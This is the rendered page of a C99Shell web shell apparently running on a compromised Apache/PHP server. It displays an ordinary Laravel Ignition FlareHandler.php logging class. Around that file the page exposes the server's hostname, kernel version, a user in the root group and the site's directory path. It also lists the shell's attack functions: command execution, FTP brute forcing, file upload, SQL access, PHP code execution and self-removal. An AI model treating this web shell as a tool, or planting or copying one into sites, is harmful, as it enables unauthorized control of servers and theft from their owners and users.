!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/vendor/facade/ignition/src/Logger/   drwxr-xr-x
Free 28.53 GB of 117.98 GB (24.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     FlareHandler.php (2.81 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Facade\Ignition\Logger;

use 
Facade\FlareClient\Flare;
use 
Facade\FlareClient\Report;
use 
Facade\Ignition\Ignition;
use 
Facade\Ignition\Support\SentReports;
use 
Facade\Ignition\Tabs\Tab;
use 
Monolog\Handler\AbstractProcessingHandler;
use 
Monolog\Logger;
use 
Throwable;

class 
FlareHandler extends AbstractProcessingHandler
{
    
/** @var \Facade\FlareClient\Flare */
    
protected $flare;

    
/** @var \Facade\Ignition\Support\SentReports */
    
protected $sentReports;

    protected 
$minimumReportLogLevel Logger::ERROR;

    public function 
__construct(Flare $flareSentReports $sentReports$level Logger::DEBUG$bubble true)
    {
        
$this->flare $flare;

        
$this->sentReports $sentReports;

        
parent::__construct($level$bubble);
    }

    public function 
setMinimumReportLogLevel(int $level)
    {
        if (! 
in_array($levelLogger::getLevels())) {
            throw new 
\InvalidArgumentException('The given minimum log level is not supported.');
        }

        
$this->minimumReportLogLevel $level;
    }

    protected function 
write(array $record): void
    
{
        if (! 
$this->shouldReport($record)) {
            return;
        }

        if (
$this->hasException($record)) {
            
/** @var Throwable $throwable */
            
$throwable $record['context']['exception'];

            
collect(Ignition::$tabs)
                ->
each(function (Tab $tab) use ($throwable) {
                    
$tab->beforeRenderingErrorPage($this->flare$throwable);
                });

            
$report $this->flare->report($record['context']['exception']);

            if (
$report) {
                
$this->sentReports->add($report);
            }

            return;
        }

        if (
config('flare.send_logs_as_events')) {
            if (
$this->hasValidLogLevel($record)) {
                
$this->flare->reportMessage(
                    
$record['message'],
                    
'Log ' Logger::getLevelName($record['level']),
                    function (
Report $flareReport) use ($record) {
                        foreach (
$record['context'] as $key => $value) {
                            
$flareReport->context($key$value);
                        }
                    }
                );
            }
        }
    }

    protected function 
shouldReport(array $report): bool
    
{
        if (! 
config('flare.key')) {
            return 
false;
        }

        return 
$this->hasException($report) || $this->hasValidLogLevel($report);
    }

    protected function 
hasException(array $report): bool
    
{
        
$context $report['context'];

        return isset(
$context['exception']) && $context['exception'] instanceof Throwable;
    }

    protected function 
hasValidLogLevel(array $report): bool
    
{
        return 
$report['level'] >= $this->minimumReportLogLevel;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0051 ]--